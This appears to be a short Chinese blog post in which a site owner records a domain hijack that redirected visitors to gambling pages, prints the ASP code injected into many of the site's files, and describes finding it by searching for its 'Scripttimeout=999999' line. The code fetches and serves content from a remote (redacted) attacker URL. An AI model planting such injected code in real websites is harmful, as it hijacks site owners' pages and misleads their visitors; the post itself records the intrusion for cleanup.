網(wǎng)站域名被劫持是一件很討厭的事情 缨历,尤其是被導(dǎo)向不良網(wǎng)站,如賭博等纹冤,很容易就被搜索引擎K了清酥,我的站也有這種情況:
后來(lái)發(fā)現(xiàn)很多文件被改成了如下:
<%
server.Scripttimeout=999999
Remote_server="http://********/suer9291qcxtr.php"? //這里就是被跳轉(zhuǎn)的網(wǎng)址
host_name="http://"&request.servervariables("HTTP_HOST")&request.servervariables("script_name")
Remote_file = Remote_server&"?host="&host_name
Content_mb=GetHtml(Remote_file)
response.write(Content_mb)
response.end()
Function GetHtml(url)
Set ObjXMLHTTP=Server.CreateObject("MSXML2.serverXMLHTTP")
ObjXMLHTTP.Open "GET",url,False
ObjXMLHTTP.setRequestHeader "User-Agent","Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:54.0) Gecko/20100101 Firefox/54.0"
ObjXMLHTTP.send
GetHtml=ObjXMLHTTP.responseBody
Set ObjXMLHTTP=Nothing
set objStream = Server.CreateObject("Adodb.Stream")
objStream.Type = 1
objStream.Mode =3
objStream.Open
objStream.Write GetHtml
objStream.Position = 0
objStream.Type = 2
objStream.Charset = "gb2312"
GetHtml = objStream.ReadText
objStream.Close
End Function
%>
先記錄一下,去清理網(wǎng)站了
因發(fā)現(xiàn)這些文件內(nèi)容不同但里面都設(shè)置了server.Scripttimeout=999999凿傅,就下了notepad++,遍歷了一遍網(wǎng)站
基本能找出來(lái)缠犀,不過(guò)忘了顏色號(hào)999999的也很多,選擇性的清理了聪舒。